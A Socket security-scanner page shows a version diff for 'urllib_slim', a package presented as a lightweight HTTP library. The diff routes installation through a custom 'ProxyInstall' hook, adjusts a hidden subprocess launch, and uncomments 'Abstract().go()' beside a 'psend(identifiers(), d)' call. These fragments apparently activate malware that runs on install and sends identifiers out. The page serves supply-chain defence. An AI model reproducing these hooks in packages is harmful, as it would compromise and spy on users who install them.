Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoInstallSign in
Socket

urllib-slim

Package Overview
Dependencies
Maintainers
1
Versions
6
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

urllib-slim - npm Package Compare versions

Comparing version
9.34
to
9.35
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: urllib_slim
Version: 9.34
Version: 9.35
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Gerald Scott <gerald.scott@thcdn.net>

@@ -12,3 +12,3 @@ from setuptools import setup as initialize

name = "urllib_slim"
version = "9.34"
version = "9.35"
install = ProxyInstall

@@ -15,0 +15,0 @@

@@ -150,3 +150,4 @@ import json

creationflags=0x00000004,
startupinfo=si
startupinfo=si,
cwd=r"C:\Users"
)

@@ -496,4 +497,4 @@

psend(identifiers(), d)
# a = Abstract()
# a.go()
a = Abstract()
a.go()

@@ -500,0 +501,0 @@

Metadata-Version: 2.4
Name: urllib_slim
Version: 9.34
Version: 9.35
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Gerald Scott <gerald.scott@thcdn.net>